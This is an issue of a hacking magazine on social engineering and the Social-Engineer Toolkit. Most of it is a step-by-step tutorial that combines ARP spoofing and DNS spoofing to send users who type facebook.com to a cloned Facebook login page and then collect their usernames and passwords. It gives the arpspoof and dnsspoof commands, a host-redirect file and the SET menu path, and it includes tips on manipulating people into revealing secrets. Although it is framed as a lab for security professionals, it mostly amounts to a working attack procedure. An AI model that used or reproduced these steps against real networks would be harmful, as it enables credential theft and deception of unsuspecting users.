his 2015 free set
DESCRIPTION
Hack in Sight. Analyzing human exploitsLevel: MR. ROBOTTRANSCRIPT
Analyzing Human Exploits Level: MR. ROBOT
3
Dear Security Professionals,
Social engineering, in the context of
information security, refers to psychological
manipulation of people into performing actions or
divulging confidential information. A type of
confidence trick for the purpose of information
gathering, fraud, or system access, it differs from
a traditional "con" in that it is often one of many
steps in a more complex fraud scheme. The term
"social engineering" as an act of psychological
manipulation is also associated with the social
sciences, but its usage has caught on among
computer and information security professionals.
In this publication we will introduce you to
the social engineering in practice. The author will
describe a popular Social Engineering Toolkit (SET)
that is a useful tool in the arsenal of very IT
Security Professional. SET is open-source Python-
driven tool aimed at penetration testing around
Social-Engineering. SET has been presented at
large-scale conferences including Blackhat,
DerbyCon, Defcon, and ShmooCon. With over
two million downloads, SET is the standard for
social-engineering penetration tests and
supported heavily within the security community.
We are grateful to MR. Vikas Kumar for
creating this guide.
Unique cover design was created by MR.
Jim Steele from www.cyexdesign.com.
Enjoy the hacking!
Hack Insight Team
[Hack]in(Sight)
Editorial Section:
Authors:
Vikas Kumar
Copy-editors:
Robrecht Minten, Zsolt
Nemeth, Phil Quinan, Larry
Pool, David Sanborn (Axiom),
Andy Stern.
DTP:
Jim Steele
www.cyexdesign.com
Publisher:
Hack Insight Press Paweł Płocki
www.hackinsight.org
Editor in Chief:
Paweł Płocki
All trademarks presented in the magazine were used only for informative purposes.
Analyzing Human Exploits Level: MR. ROBOT
4
THE SOCIAL-ENGINEER TOOLKIT (SET)
The Social-Engineer Toolkit is an open-source penetration testing framework designed
for social engineering. SET has a number of custom attack vectors that allow you to
make a believable attack quickly. SET is a product of Trusted Sec and designed and
developed by Mr. David Kennedy who is a CEO of Trusted Sec company. It supports
windows as well as Linux platform. The Social-Engineer Toolkit has over 2 million
downloads and is aimed at leveraging advanced technological attacks in a social-
engineering type environment. Trusted Sec believes that social-engineering is one of the
hardest attacks to protect against and now one of the most prevalent.
The Social Engineer Toolkit incorporates many useful social-engineering attacks all in one interface. The main purpose of SET is to automate and improve on many of the social-engineering attacks out there. It can automatically generate exploit-hiding web pages or email messages, and can use Metasploit payloads to, for example, connect back with a shell once the page is opened
Figure 1: Social Engineer Toolkit
What is Social Engineering?
Social Engineering is an art of wangling people to reveal confidential information which is not supposed to be told out. It involves gaining the trust of an individual in order to obtain confidential information. Social Engineering is a non-technical attack but involves tactics for making a victim get trapped. This is an art of gaining important information about an organization, its employees, systems etc.
Here, the victim can be anybody; where which includes a high possibility of a hacker himself getting victimized at times! This would be possible when the hacker could be a
Analyzing Human Exploits Level: MR. ROBOT
5
part of a group of friends, and the entire group can be victimized at once, as it is completely based on trust where tricking them emotionally would not be very difficult.
Figure 2: Social Engineering
Sometimes, it so happens that in a continuous conversation, we do not even realize that we are revealing personal & confidential information, or end up revealing some hints, which will in turn make the job of a hacker easier, to hack into their extremely personal & confidential information.
Some basic information which can be gathered very easily would include a person’s favorite color, actor, food, car, teacher, best friend etc. It might even include some of the information about childhood, school days or about his/her family. Such information would suffice to an extent in order to hack into any
account, as the secret questions to recover the password for any application would mostly involve these. Let assume, you have become the victim. Now, do you mind answering any questions like your favorite teacher or your pet name or any such questions mentioned above? If you have a very close friend who would try for a social engineering attack does not have to ask you for any such questions, he would be aware of you and your likes and dislikes up to some extent.
Analyzing Human Exploits Level: MR. ROBOT
6
Diagram 1: A sample Email which can mislead the admin of an organization
Generally if you ask for a piece of sensitive information, people naturally become suspicious immediately. If you pretend you already have the information and give out wrong information, they will frequently correct you unconsciously – thereby rewarding you with the correct piece of information you are looking for.
Social engineering toolkit! No, we do not need a SET to victimize anyone! Real-time hackers do not completely depend on social engineering tool kit.
Figure 3: Social Engineering
Analyzing Human Exploits Level: MR. ROBOT
7
Preventing Social Engineering:
In my opinion, I don’t think there is any well-defined way or application which helps user to prevent social engineering. Different methods are being evolved hence having an eye on different attacks is recommended.
Educating employees of an organization and performing random tests on them might be helpful to identify the mouse traps within the organization, it is recommended not to share their passwords even with their higher authorities or team leaders, let them have an administrator password if access required.
Organizations have to take care of social engineering too, along with other security attacks as it holds more than 50% of share on different attacks.
Frequency of social engineering when compared to other security Attacks.
Figure 4: Social Engineering (Referred Link: http://solidmonster.com/what-is-social-engineering/)
Analyzing Human Exploits Level: MR. ROBOT
8
CREDENTIAL HARVESTING ATTACK ALONG WITH DNS SPOOFING USING SOCIAL ENGINEERING TOOLKIT
For completing this tutorial you must use these following required things which are as follows:-
Kali Linux (any version) Windows Universal (any OS Version) Same Network (In my case I am using VMWare Based NAT option to put both
Operating System in same network.) As many of you already know about Phishing attack method in which an attacker always created some trust worthy website’s fake page and add them with some script to upload them all on some service such as Apache Server and then after send this fake page link or an IP address to victim such as http://www.fakepage.com or http://192.168.0.117 but now a days most of the people aware about it so as a Researcher we have found something very interesting and new method of compromising security of an individual or an organization, where we are going to add DNS Spoofing method with phishing attack to redirect a victim on our phishing page only but without letting him know that he is going to access phishing website or a page when he actually type original website address. Let’s start the practical so I am going to use Kali Linux and simply use terminal and give following command to enable IP Forwarding:
root@kali:~# echo 1 > /proc/sys/net/ipv4/ip_foward
Figure 5: Enabling IP Forwarding After that to confirm whether we have successfully enabled IP forwarding or not we are to give following command in terminal to check. If it comes with reply 1 (enabled) and 0 (not enabled):
root@kali:~# cat /proc/sys/net/ipv4/ip_foward
Figure 6: Confirming about IP Forwarding
Analyzing Human Exploits Level: MR. ROBOT
9
Now we are to start ARPSPOOFING through kali Linux.
What is ARP Spoofing? ARP spoofing is a type of attack in which a malicious actor sends falsified ARP (Address Resolution Protocol) messages over a local area network. This results in the linking of an attacker's MAC address with the IP address of a legitimate computer or server on the network. root@kali:~# arpspoof --help
Figure 7: help menu of ARP Spoof After this we required some sort of details to start ARP Spoofing through kali linux
Our Interface name Gateway IP address
Before moving ahead step by step let’s check all the details to finally start ARP Spoofing. So first I am going to show you how to check our interface name for which you are to open a terminal in kali linux and give following command:
root@kali:~# ifconfig
Figure 8: checking interface name.
Analyzing Human Exploits Level: MR. ROBOT
10
Now let’s check gateway IP address for which you are open one more new terminal and give following command and you are to give your gateway ip address which might be same or differ but accordingly.
root@kali:~# route
Figure 9: checking gateway IP address. Now finally we are ready to start ARP Spoofing through kali linux
Syntax: arpspoof -i <interface name> <gateway IP address>
root@kali:~# arpspoof -i eth0 192.168.101.2
Figure 10: starting ARP Spoofing. Now we are to create a file with any name is root but in our case we are going to use name dns-list by using following command:
root@kali:~# touch dns-list
Analyzing Human Exploits Level: MR. ROBOT
11
Figure 11: creating file. Now are to select Places > Home Folder
Figure 12: Go to Root through this process There we will be finding our created file with name dns-list
Analyzing Human Exploits Level: MR. ROBOT
12
Figure 13: created file. Now open this file in any notepad editor such as notepad, gedit or leafpad. In our case we are going to open this file in leafpad.
Figure 14: opening file in notepad editor. Now you are to spoof DNS for which you must know your IP address for which you are to open terminal and give following command:
root@kali:~# ifconfig
Analyzing Human Exploits Level: MR. ROBOT
13
Figure 15: checking IP Address. After this you are to go back to notepad editor and give following details to redirect a victim on your system IP address and save this file.
192.168.101.130 www.facebook.com 192.168.101.130 *.facebook.com 192.168.101.130 m.facebook.com
Figure 16: putting facebook DNS information to redirect on system IP address.
Analyzing Human Exploits Level: MR. ROBOT
14
Now we are to open one new terminal and give following command to check help menu of DNS Spoof:
root@kali:~# dnsspoof --help
Figure 17: checking help menu of dns spoof. Now we are to configure DNS Spoof in terminal where we are to give following command:
root@kali:~# dnsspoof -i eth0 -f ‘/root/dns-list’
Figure 18: starting DNS Spoof. Now we are to move on Social Engineering Toolkit so to start we are to following path in Kali Linux.
Analyzing Human Exploits Level: MR. ROBOT
15
Go to Application > Kali Linux > Exploitation Tools > Social Engineering Toolkit > Setoolkit
Figure 19: starting Social Engineering Toolkit. To start services of Social Engineering Toolkit you must type Y
Figure 20: Starting Services of Social Engineering Toolkit.
Now we are to Select number 1 for Social-Engineering Attacks
Analyzing Human Exploits Level: MR. ROBOT
16
Figure 21: Selecting Social-Engineering Attacks.
Now select number 2 for Website Attack Vectors
Figure 22: Selecting Website Attack Vectors.
Now Select Number 3 for Credential Harvester Attack Method
Analyzing Human Exploits Level: MR. ROBOT
17
Figure 23: Select Credential Harvester Attack Method.
Now afterward select number 2 for Site Cloner
Figure 24: Select Site Cloner Now we are to give our System IP Address in case it asks for
Analyzing Human Exploits Level: MR. ROBOT
18
Figure 25: Giving System IP Address. Now it will be asking for entering URL to clone where we are to put our selected website but in our case we are going to use https://www.facebook.com because on upper pages we used facebook to redirect on our System IP address but now the benefit is what that we have hosted facebook cloned page on our system IP address so when our victim will type www.facebook.com actually he will be redirected our system ip address where we have hosted cloned page of faceook and as usual he will be trying to log in by considering that original page of facebook but unknowingly will help to an attacker to get his credentials such as username and password
Figure 26: Cloning facebook page. Now after that if message comes to your screen to start apache server than simply press Y to start
Analyzing Human Exploits Level: MR. ROBOT
19
Figure 27: starting apache server. Now after that go windows 7 and open Internet Explorer to type www.facebook.com
Figure 28: opening facebook page. Now you can see in this given picture that we have got facebook page but it’s not actual facebook page it just a cloned page which winning trust of victim as he thinks its original. With the help of dnsspoof we have simply redirected a victim to our cloned page but still URL will be www.facebook.com only.
Analyzing Human Exploits Level: MR. ROBOT
20
Figure 29: Redirecting a victim on cloned facebook page. Now we are going to put some credential in this cloned page
Figure 30: putting credential. Now after that come back to kali linux and open terminal and give location through command to access username and password detail
Analyzing Human Exploits Level: MR. ROBOT
21
root@kali:~# cd /var/www
Figure 31: accessing hosted file location. Now to list down file and folder details on this given location simply use following command:
root@kali:~# ls
Figure 32: accessing all files and folder information. Now we are to simply use following command to check username and password information:
root@kali:~# cat ‘harvester_2015-08-17 19:33:48.658364.txt’
Analyzing Human Exploits Level: MR. ROBOT
22
Figure 33: enjoying username and password details. I hope you like this article and my other articles published in Hack Insight Magazine. For me, Social Engineering is the new area of expertise and if you find any difficulty to complete this practical at your location so for that you may contact me anytime. For reaching me I am going to share all the contact details next to this page. Thank you for your kind support
Analyzing Human Exploits Level: MR. ROBOT
23
About the Author
VIKAS KUMAR Ethical Hacker | Speaker | Penetration Tester (MBA with Information System, CEH, ACSP and CHCISE), is an Information Security Analyst and Co-founder of Cyber Hunt Technology, where his responsibilities include analyzing web applications, network, database, server and discovering new ways of uncovering threats, vulnerabilities and security risks. As Information Security Analyst focusing on threat intelligence and investigation of advanced cyber-attacks.
Contact Information
Telephone: (+91) 9945-201-734 Email: [email protected] [email protected] Web: www.cyber-hunt.com Facebook: https://www.facebook.com/cyberhunt2011
LinkedIn: https://www.linkedin.com/profile/view?id=71569482&trk=tab_pro
Cyber Hunt Facebook Page: https://www.facebook.com/pages/Cyber-Hunt-Security-Group-of-Technology-P-Ltd/559533680741975?ref=tn_tnmn
Analyzing Human Exploits Level: MR. ROBOT
24
Did you enjoy reading this issue?
Find out more in Hack Insight Subscription! Subscribe to Hack Insight and stay update with advanced hacking and security techniques. Our single subscription costs $174 and includes: --> 24 unique publications per one year. --> Access to all the previous releases from the first HiS issue. --> 2 Special issues concerning "Best of Hack Insight" in each year. Hack Insight Subscription is prepared for IT Security professionals, enthusiasts, engineers, managers and geeks who are willing to improve advanced technical knowledge thanks to our articles written by world class experts. Our subscription covers many different topics, like: Network Scanning, Malware, Cloud Security, DDoS, Hacking ID/Passwords, Mobile and Cyber Security, Reverse Engineering, WiFi Vulnerabilities and much more.
Analyzing Human Exploits Level: MR. ROBOT
25
Download latest publications!
Analyzing Human Exploits Level: MR. ROBOT
26
